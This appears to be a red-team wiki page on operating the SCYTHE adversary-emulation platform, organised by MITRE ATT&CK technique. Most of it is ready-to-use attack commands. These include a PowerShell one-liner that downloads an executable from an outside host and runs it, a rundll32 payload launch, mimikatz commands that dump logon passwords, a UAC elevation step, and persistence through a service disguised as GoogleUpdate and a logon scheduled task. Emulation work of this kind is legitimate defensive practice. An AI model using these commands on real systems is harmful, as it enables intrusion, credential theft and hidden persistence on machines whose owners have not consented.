SCYTHE

Setup Campaign

https://localhost:8443

Campaign Manager - New Campaign

Select the following options:

Name: unique name for the campaign
Target Operating System: Windows, Linux, or macOS
Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
Communication Module:
- HTTPS is default,
- DNS, HTTP, and Stego require relays to be installed on redirector
- Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats

Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:

rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:

$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move file to virtual file system

loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate 
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist 

Synatax: 
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"

Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown

PreviousSliver NextTrevorC2

Last updated 5 years ago

hashtagSetup Campaign

hashtagCommunity Threats (Third Party Adversary Emulation Plans)

hashtagDeploy Payload

hashtagUser Execution: Malicious File (T1204.002):

hashtagSigned Binary Proxy Execution: Rundll32 (T1218.011):

hashtagCommand and Scripting Interpreter: PowerShell (T1059.001)

hashtagEmulate TTPs

hashtagLoad Python Runtime

hashtagDownload files

hashtagPrivilege Escalation (TA0004)

hashtagUAC (T1088)

hashtagCredential Access (TA0006)

hashtagCredential Dumping (T1003)

hashtagPersistence (TA0003)

hashtagNew Service (T1050)

hashtagScheduled Task (T1168)

hashtagClean up

hashtagPersistence:

hashtagKill agent: